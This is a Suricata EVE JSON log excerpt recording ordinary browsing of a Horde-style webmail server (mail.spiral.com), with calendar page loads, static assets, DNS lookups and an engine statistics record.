{"timestamp":"2020-02-29T00:12:41.000689+0000","flow_id":128482540935253,"event_type":"flow","src_ip":"192.168.10.130","src_port":34798,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1291,"bytes_toclient":8021,"start":"2020-02-29T00:11:34.022613+0000","end":"2020-02-29T00:11:40.125961+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:43.700464+0000","flow_id":931899127526949,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52732,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7922},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44805,"tx_id":0}} {"timestamp":"2020-02-29T00:12:43.898656+0000","flow_id":1915120221140576,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34113,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54857,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:44.000246+0000","event_type":"stats","stats":{"uptime":14416,"capture":{"kernel_packets":135013,"kernel_drops":0},"decoder":{"pkts":135016,"bytes":93048265,"invalid":187,"ipv4":133525,"ipv6":8,"ethernet":135016,"raw":0,"null":0,"sll":0,"tcp":128245,"udp":5078,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2759,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2775,"synack":2766,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1800,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2319,"failed_udp":111},"tx":{"http":4629,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2399}},"flow_mgr":{"closed_pruned":2738,"new_pruned":15,"est_pruned":2365,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22411,"memcap_state":0,"memcap_global":0},"http":{"memuse":60014,"memcap":0}}} {"timestamp":"2020-02-29T00:12:44.002545+0000","flow_id":2246425387862493,"event_type":"flow","src_ip":"192.168.10.122","src_port":49223,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":173,"bytes_toclient":283,"start":"2020-02-29T00:07:30.133597+0000","end":"2020-02-29T00:07:43.926789+0000","age":13,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:44.006850+0000","flow_id":1915120221140576,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34113,"proto":"UDP","dns":{"type":"answer","id":54857,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:44.006850+0000","flow_id":1915120221140576,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34113,"proto":"UDP","dns":{"type":"answer","id":54857,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:44.001646+0000","flow_id":150206485572827,"event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958},"app_proto":"http","fileinfo":{"filename":"\/js\/ckeditor\/ckeditor_basic.js","state":"CLOSED","stored":false,"size":7141,"tx_id":6}} {"timestamp":"2020-02-29T00:12:44.330105+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24489}} {"timestamp":"2020-02-29T00:12:44.348475+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24489},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:12:44.351218+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451}} {"timestamp":"2020-02-29T00:12:44.353979+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470}} {"timestamp":"2020-02-29T00:12:44.398481+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":10823,"tx_id":1}} {"timestamp":"2020-02-29T00:12:44.407268+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046}} {"timestamp":"2020-02-29T00:12:44.410082+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046},"app_proto":"http","fileinfo":{"filename":"\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":10406,"tx_id":2}} {"timestamp":"2020-02-29T00:12:44.411619+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376}} {"timestamp":"2020-02-29T00:12:44.428156+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":24731,"tx_id":3}} {"timestamp":"2020-02-29T00:12:44.430971+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":47195},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/kronolith.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":4}} {"timestamp":"2020-02-29T00:12:44.449643+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":50590}} {"timestamp":"2020-02-29T00:12:44.451037+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":17678,"tx_id":0}} {"timestamp":"2020-02-29T00:12:44.451681+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688}} {"timestamp":"2020-02-29T00:12:44.454644+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/gnid3.wav","state":"CLOSED","stored":false,"size":13688,"tx_id":1}} {"timestamp":"2020-02-29T00:12:44.456844+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168}} {"timestamp":"2020-02-29T00:12:44.457400+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151}} {"timestamp":"2020-02-29T00:12:44.457725+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/doorbell.wav","state":"CLOSED","stored":false,"size":5168,"tx_id":5}} {"timestamp":"2020-02-29T00:12:44.458784+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776}} {"timestamp":"2020-02-29T00:12:44.479523+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/theetone.wav","state":"CLOSED","stored":false,"size":24776,"tx_id":6}} {"timestamp":"2020-02-29T00:12:44.487927+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292}} {"timestamp":"2020-02-29T00:12:44.489034+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/left.png","state":"CLOSED","stored":false,"size":292,"tx_id":7}} {"timestamp":"2020-02-29T00:12:44.492155+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282}} {"timestamp":"2020-02-29T00:12:44.492828+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/right.png","state":"CLOSED","stored":false,"size":282,"tx_id":8}} {"timestamp":"2020-02-29T00:12:44.492847+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256}} {"timestamp":"2020-02-29T00:12:44.493398+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:12:44.493548+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/jetsndb.wav","state":"CLOSED","stored":false,"size":31256,"tx_id":2}} {"timestamp":"2020-02-29T00:12:44.494227+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/dayview.png","state":"CLOSED","stored":false,"size":349,"tx_id":9}} {"timestamp":"2020-02-29T00:12:44.494337+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:12:44.494905+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/workweekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":3}} {"timestamp":"2020-02-29T00:12:44.495681+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:12:44.496240+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:12:44.496257+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/weekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":10}} {"timestamp":"2020-02-29T00:12:44.496885+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301}} {"timestamp":"2020-02-29T00:12:44.496897+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/monthview.png","state":"CLOSED","stored":false,"size":358,"tx_id":4}} {"timestamp":"2020-02-29T00:12:44.497615+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/yearview.png","state":"CLOSED","stored":false,"size":301,"tx_id":11}} 